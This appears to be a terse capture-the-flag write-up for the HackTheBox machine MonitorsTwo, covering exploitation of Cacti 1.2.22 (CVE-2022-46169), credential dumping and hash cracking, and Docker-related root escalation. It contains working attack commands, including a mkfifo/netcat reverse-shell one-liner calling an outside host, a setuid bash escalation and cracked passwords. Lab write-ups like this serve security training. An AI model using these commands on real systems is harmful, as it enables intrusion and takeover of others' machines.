CTF MonitorsTwo

CTFHackTheBox

Nmap

1
nmap -p- -sVC monitors -vvvv

Output:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 48add5b83a9fbcbef7e8201ef6bfdeae (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC82vTuN1hMqiqUfN+Lwih4g8rSJjaMjDQdhfdT8vEQ67urtQIyPszlNtkCDn6MNcBfibD/7Zz4r8lr1iNe/Afk6LJqTt3OWewzS2a1TpCrEbvoileYAl/Feya5PfbZ8mv77+MWEA+kT0pAw1xW9bpkhYCGkJQm9OYdcsEEg1i+kQ/ng3+GaFrGJjxqYaW1LXyXN1f7j9xG2f27rKEZoRO/9HOH9Y+5ru184QQXjW/ir+lEJ7xTwQA5U1GOW1m/AgpHIfI5j9aDfT/r4QMe+au+2yPotnOGBBJBz3ef+fQzj/Cq7OGRR96ZBfJ3i00B/Waw/RI19qd7+ybNXF/gBzptEYXujySQZSu92Dwi23itxJBolE6hpQ2uYVA8VBlF0KXESt3ZJVWSAsU3oguNCXtY7krjqPe6BZRy+lrbeska1bIGPZrqLEgptpKhz14UaOcH9/vpMYFdSKr24aMXvZBDK1GJg50yihZx8I9I367z0my8E89+TnjGFY2QTzxmbmU=
|   256 b7896c0b20ed49b2c1867c2992741c1f (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBH2y17GUe6keBxOcBGNkWsliFwTRwUtQB3NXEhTAFLziGDfCgBV7B9Hp6GQMPGQXqMk7nnveA8vUz0D7ug5n04A=
|   256 18cd9d08a621a8b8b6f79f8d405154fb (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKfXa+OM5/utlol5mJajysEsV4zb/L0BJ1lKxMPadPvR
80/tcp open  http    syn-ack nginx 1.18.0 (Ubuntu)
|_http-title: Login to Cacti
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-favicon: Unknown favicon MD5: 4F12CCCD3C42A4A478F067337FE92794
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

port 22 & 80

Login page


Version 1.2.22 | (c) 2004-2023 - The Cacti Group

Subdirectory

1
gobuster dir -u http://monitors -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt


Error 301, keep or later.

exploit

https://raw.githubusercontent.com/FredBrave/CVE-2022-46169-CACTI-1.2.22/main/CVE-2022-46169.py

1
python cactiRCE2 -u http://10.10.11.211 --LHOST=10.10.14.23 --LPORT=4546

lse

1
2
3
4
[!] fst020 Uncommon setuid binaries........................................ yes!
---
/sbin/capsh
---

linpease

1
2
3
4
5
6
7
8
9
10
11
12
13
╔══════════╣ Processes with credentials in memory (root req)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#credentials-from-process-memory                                                                                                                 
apache2 process found (dump creds from memory as root)                             

/etc/hosts
172.19.0.3      50bca5e748b0

══╣ Possible private SSH keys were found!
/var/www/html/include/vendor/phpseclib/Crypt/RSA.php

╔══════════╣ Unexpected in root
/.dockerenv                                                                        /entrypoint.sh

cat /entrypoint.sh

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
#!/bin/bash
set -ex

wait-for-it db:3306 -t 300 -- echo "database is connected"
if [[ ! $(mysql --host=db --user=root --password=root cacti -e "show tables") =~ "automation_devices" ]]; then
    mysql --host=db --user=root --password=root cacti < /var/www/html/cacti.sql
    mysql --host=db --user=root --password=root cacti -e "UPDATE user_auth SET must_change_password='' WHERE username = 'admin'"
    mysql --host=db --user=root --password=root cacti -e "SET GLOBAL time_zone = 'UTC'"
fi

chown www-data:www-data -R /var/www/html
# first arg is `-f` or `--some-option`
if [ "${1#-}" != "$1" ]; then
        set -- apache2-foreground "$@"
fi

exec "$@"

/var/www/html/cacti.sql
mysql Ver 15.1 Distrib 10.5.15-MariaDB, for debian-linux-gnu (x86_64) using EditLine wrapper

I can manipulate the sql file, should be able spawn a shell
https://gtfobins.github.io/gtfobins/mysql/

http://monitors/cacti.sql

1
2
3
4
5
6
--
-- Dumping data for table `user_auth`
--

INSERT INTO user_auth VALUES (1,'admin','21232f297a57a5a743894a0e4a801fc3',0,'Administrator','','on','on','on','on','on','on',2,1,1,1,1,'on',-1,-1,'-1','',0,0,0);
INSERT INTO user_auth VALUES (3,'guest','43e9a4ab75570f5b',0,'Guest Account','','on','on','on','on','on',3,1,1,1,1,1,'',-1,-1,'-1','',0,0,0);

21232f297a57a5a743894a0e4a801fc3 = admin

Inside cacti.sql

1
!!rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.14.23 4545 >/tmp/f

DL

1
www-data@50bca5e748b0:/var/www/html$ wget http://10.10.14.23/cacti.sql
1
2
3
mysql --host=db --user=root --password=root cacti -e "SELECT LOAD_FILE('/etc/passwd') AS Result;"

mysql --host=db --user=root --password=root cacti -e "SELECT LOAD_FILE('../../../../../../etc/passwd');"

can’t do shit

1
mysql --host=db --user=root --password=root cacti -e "show tables"

1
2
mysql --host=db --user=root --password=root cacti -e "SELECT * FROM user_auth"
mysql --host=db --user=root --password=root cacti -e "SELECT username, password FROM user_auth"

1
2
3
4
5
6
7
+----------+--------------------------------------------------------------+
| username | password                                                     |
+----------+--------------------------------------------------------------+
| admin    | $2y$10$IhEA.Og8vrvwueM7VEDkUes3pwc3zaBbQ/iuqMft/llx8utpR1hjC |
| guest    | 43e9a4ab75570f5b                                             |
| marcus   | $2y$10$vcrYth5YcCLlZaPDj6PwqOYTw68W1.3WeKlBn70JonsdW/MhFYK4C |
+----------+--------------------------------------------------------------+

John

1
2
3
cat hashs 
$2y$10$IhEA.Og8vrvwueM7VEDkUes3pwc3zaBbQ/iuqMft/llx8utpR1hjC
$2y$10$vcrYth5YcCLlZaPDj6PwqOYTw68W1.3WeKlBn70JonsdW/MhFYK4C
1
john -wordlist=/usr/share/wordlists/rockyou.txt hashs


funkymonkey

ssh as marcus

1
2
ssh marcus@monitors
password: funkymonkey
1
2
3
4
5
6
python2.7 -m SimpleHTTPServer 80 
wget http://10.10.14.23/lse.sh
wget http://10.10.14.23/linpeas.sh
chmod +x *
./lse.sh
./linpeas.sh
1
Sudo version 1.8.31

new vhost, add to /etc/hosts

tail -1 /etc/hosts 

1
10.10.11.211    monitors cacti.monitorstwo.htb monitorstwo.htb
1
2
3
4
5
╔══════════╣ .sh files in path
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#script-binaries-in-path                                                              
/usr/bin/gettext.sh                                                                                                                                     
/usr/bin/rescan-scsi-bus.sh

/usr/bin/gettext.sh

1
2
3
marcus@monitorstwo:/var/www/html$ /usr/bin/gettext.sh 
GNU gettext shell script function library version 0.19.8.1
Usage: . gettext.sh

1
Docker version 20.10.5+dfsg1, build 363e9a8

https://github.com/UncleJ4ck/CVE-2021-41091

Go back to the container

Be root

1
2
/sbin/capsh --gid=0 --uid=0 --
chmod u+s /bin/bash

On kali

1
2
./exp.sh
./bin/bash -p